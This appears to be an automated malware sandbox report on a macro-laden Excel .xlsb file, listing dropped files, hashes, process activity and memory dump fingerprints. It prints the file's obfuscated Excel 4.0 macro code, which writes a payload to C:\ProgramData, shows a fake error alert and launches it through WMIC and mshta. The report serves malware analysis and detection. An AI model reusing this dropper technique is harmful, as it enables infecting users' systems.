                    Preview: .PNG........IHDR... .........V%.4....IDATx...w..G...OUu..l.VY.%... ..c..`.lc....L4&\........H..6...`0... ....j.if......Q.r.jW.._..vB.t....+....#..u.Q......0.._".RJ)..Rj......k.Y.q....zT)..RJ)..". J)..RJ.1..D)..RJ)5f4.(..RJ)......RJ)......RJ)...3.@.RJ)..RcF..RJ)..Rj.h.QJ)..RJ... J)..RJ.1..D)..RJ)5f4.(..RJ)......RJ)......RJ)...3.@.RJ)..RcF..RJ)..Rj.h.QJ)..RJ... J)..RJ.1..D)..RJ)5f4.(..RJ)......RJ)......RJ)...3.@.RJ)..RcF..RJ)..Rj.h.QJ)..RJ... J)..RJ.1..D)..RJ)5f4.(..RJ)......RJ)......RJ)...3.@.RJ)..RcF..RJ)..Rj.h.QJ)..RJ... J)..RJ.1..D)..RJ)5f4.(..RJ)......RJ)......RJ)...3.@.RJ)..RcF..RJ)..Rj.h.QJ)..RJ... J)..RJ.1..D)..RJ)5f4.(..RJ)......RJ)......RJ)...3.@.RJ)..RcF..RJ)..Rj.h.QJ)..RJ... J)..RJ.1..D)..RJ)5f4.(..RJ)......RJ)......RJ)...3.@.RJ)..RcF..RJ)..Rj.h.QJ)..RJ... J)..RJ.1..D)..RJ)5f4.(..RJ)......RJ)......RJ)...3.@.RJ)..RcF..RJ)..Rj.h.QJ)..RJ... J)..RJ.1..D)..RJ)5f4.(..RJ)......RJ)......RJ)...3.@.RJ)..Rc&..;......`A"......{..RJ..L..Rj... ....L6....!J)..zl
                    C:\Users\user\Desktop\~$4310352755503838173672.xlsb
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):165
                    Entropy (8bit):1.4377382811115937
                    Encrypted:false
                    SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                    MD5:797869BB881CFBCDAC2064F92B26E46F
                    SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                    SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                    SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                    Static File Info

                    General

                    File type:Microsoft Excel 2007+
                    Entropy (8bit):7.8592249378591506
                    TrID:
                    • Excel Microsoft Office Open XML Format document with Macro (51004/1) 36.56%
                    • Microsoft Excel Office Binary workbook document (40504/1) 29.03%
                    • Excel Microsoft Office Open XML Format document (40004/1) 28.67%
                    • ZIP compressed archive (8000/1) 5.73%
                    File name:4310352755503838173672.xlsb
                    File size:76354
                    MD5:88a363b14590b0c0aab8d954ac3e1b5c
                    SHA1:af7b370945a8bcec0a979c93ef83770073f2b08a
                    SHA256:1004873035711456c20f311b16484154554d13e060dd2bbb2c0c2ddd4e73ced4
                    SHA512:c77136404c44801589199bb04ce1fc58b7da7bd3b67b402a62336fd3ec4357082637c183ec2e1cd369eb9808e08eb9e387a31df62897fe59ac5b24b773dbf85f
                    SSDEEP:1536:8pWJhitOVrujUjtZIcK9TjSK+ua7aFIMKIpq3HZF5dtu:bJw4ACK9xKI2ZF5dtu
                    File Content Preview:PK..........!.m\.%............[Content_Types].xml ...(.........................................................................................................................................................................................................

                    File Icon

                    Icon Hash:e4e2ea8aa4b4b4b4

                    Static OLE Info

                    General

                    Document Type:OpenXML
                    Number of OLE Files:1

                    OLE File "4310352755503838173672.xlsb"

                    Indicators

                    Has Summary Info:
                    Application Name:
                    Encrypted Document:
                    Contains Word Document Stream:
                    Contains Workbook/Book Stream:
                    Contains PowerPoint Document Stream:
                    Contains Visio Document Stream:
                    Contains ObjectPool Stream:
                    Flash Objects Count:
                    Contains VBA Macros:

                    Macro 4.0 Code

                    0,564,=FOPEN(CHAR(67) & "" & CHAR(58) & "\ProgramData\lvDMlI" & CHAR(68) & "BF" & CHAR(46) & "rt" & CHAR(102), 3)
                    3,564,=B9227+D1716
                    7,564,=C1683+A6201
                    8,564,=C9778+D1874
                    10,564,=FOR.CELL("BqjyNef",Sheet1!CJ166:EO248, TRUE)
                    12,564,=D2396+A5369
                    13,564,=C9779+B2256
                    16,564,=D5029+B8131
                    18,564,=B512+C1310
                    19,564,=C4151+A9110
                    20,564,=FWRITE(0,CHAR(BqjyNef))
                    23,564,=A9409+B5628
                    24,564,=B400+B7779
                    25,564,=B3837+A5424
                    26,564,=B3794+B68
                    27,564,=B4006+C2851
                    31,564,=NEXT()
                    32,564,=A2203+C9084
                    33,564,=A6170+C4158
                    34,564,=B190+C4717
                    36,564,=C9207+D2156
                    37,564,=D2252+A5157
                    38,564,=B3284+B4506
                    41,564,=C8747+D6122
                    44,564,=D625+B8100
                    45,564,=A5167+B7705
                    46,564,=ALERT("Error! Sending report " & CHAR(116) & CHAR(111) & " Micros" & CHAR(111) & "ft...")
                    48,564,=A7505+B4178
                    49,564,=C6293+D9181
                    51,564,=B5726+A9482
                    52,564,=C6705+A9064
                    53,564,=B3593+A529
                    54,564,=D7586+D6975
                    57,564,=D9301+D1736
                    58,564,=B7822+B810
                    60,564,=EXEC(CHAR(119) & CHAR(109) & CHAR(105) & "c process call create" & CHAR(32) & CHAR(34) & "msh" & CHAR(116) & CHAR(97) & "" & CHAR(32) & CHAR(67) & ":\Program" & CHAR(68) & "at" & CHAR(97) & "" & CHAR(92) & "lvD" & CHAR(77) & "lID" & CHAR(66) & "F.r" & CHAR(116) & CHAR(102) & CHAR(34))
                    61,564,=B8804+A5152
                    66,564,=D5361+A6822
                    69,564,=B3775+A7830
                    70,564,=RETURN()
                    

                    Network Behavior

                    No network behavior found

                    Code Manipulations

                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Start time:12:51:14
                    Start date:02/12/2021
                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                    Imagebase:0x13f8c0000
                    File size:28253536 bytes
                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:12:51:38
                    Start date:02/12/2021
                    Path:C:\Windows\System32\wbem\WMIC.exe
                    Wow64 process (32bit):false
                    Commandline:wmic process call create "mshta C:\ProgramData\lvDMlIDBF.rtf"
                    Imagebase:0xff380000
                    File size:566272 bytes
                    MD5 hash:FD902835DEAEF4091799287736F3A028
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:12:51:39
                    Start date:02/12/2021
                    Path:C:\Windows\System32\mshta.exe
                    Wow64 process (32bit):false
                    Commandline:mshta C:\ProgramData\lvDMlIDBF.rtf
                    Imagebase:0x13f7a0000
                    File size:13824 bytes
                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Disassembly

                    Code Analysis

                    Reset < >

                      Executed Functions

                      Non-executed Functions

                      Memory Dump Source
                      • Source File: 00000000.00000002.663076892.0000000002190000.00000004.00000001.sdmp, Offset: 02190000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2190000_EXCEL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 175a593de5f318d4f8a522b31e6e045bf285026dc0f80d65d572651f82e15253
                      • Instruction ID: 4729f8492bf667ee33d1686a498731df6ed7272d7132eb723464a24af5825a50
                      • Opcode Fuzzy Hash: 175a593de5f318d4f8a522b31e6e045bf285026dc0f80d65d572651f82e15253
                      • Instruction Fuzzy Hash: A172655154E3D11FC70787380DB96A6BF71AE53118B2E91DBC6C2DB8E3E608492AC763
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.663076892.0000000002190000.00000004.00000001.sdmp, Offset: 02190000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2190000_EXCEL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 286c7a71c411a66824215b876cb92698cd0e2f93184981e3a95f4ad44211d7c5
                      • Instruction ID: b6cef8a882dd33a706ddb6f69499d1b99d9d3d39fca4ba76195d847271a546d6
                      • Opcode Fuzzy Hash: 286c7a71c411a66824215b876cb92698cd0e2f93184981e3a95f4ad44211d7c5
                      • Instruction Fuzzy Hash: E572755154E3D11FC70787380DB96A6BF71AE13118B2E91DBC6C2DB8E3E608492AC763
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.663076892.0000000002190000.00000004.00000001.sdmp, Offset: 02190000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2190000_EXCEL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e987d2625fb0595fabc50c6f097c89b097ad4e99118634633b409521f5f7c3db
                      • Instruction ID: b55b877389e161cbe8b031602565c6f5d050861fd396b72d5f1837bd2076d9d2
                      • Opcode Fuzzy Hash: e987d2625fb0595fabc50c6f097c89b097ad4e99118634633b409521f5f7c3db
                      • Instruction Fuzzy Hash: D372655154E3D11FC70787380DB96A6BF71AE53118B2E91DBC6C2DB8E3E608492AC763
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.663076892.0000000002190000.00000004.00000001.sdmp, Offset: 02190000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2190000_EXCEL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7f3b8214a7cc7d30f583a0a4959ab2dfe12e3a9ee1ddd722dfa801aa8f9220d1
                      • Instruction ID: aa589a474cf622f772272805173417a9f3d7b5bb424f08baad25da409b4c4de8
                      • Opcode Fuzzy Hash: 7f3b8214a7cc7d30f583a0a4959ab2dfe12e3a9ee1ddd722dfa801aa8f9220d1
                      • Instruction Fuzzy Hash: 5472655154E3D11FC70787380DB96A6BF71AE53118B2E91DBC6C2DB8E3E608492AC763
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.663076892.0000000002190000.00000004.00000001.sdmp, Offset: 02190000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2190000_EXCEL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 55f7aa5e46d1b3910a7f506b712b20c7d8822a6ccf25430664cb8e1d937aca64
                      • Instruction ID: 2f74868371b6cc56af4434eba88360eb640e87bd24efb1610ca35a28d6b6aaf9
                      • Opcode Fuzzy Hash: 55f7aa5e46d1b3910a7f506b712b20c7d8822a6ccf25430664cb8e1d937aca64
                      • Instruction Fuzzy Hash: 4AC1425549E3D11FD71383780EB91927FB28E97158B2E15CBC2C1DB4A3EA180A6AD733
                      Uniqueness

                      Uniqueness Score: -1.00%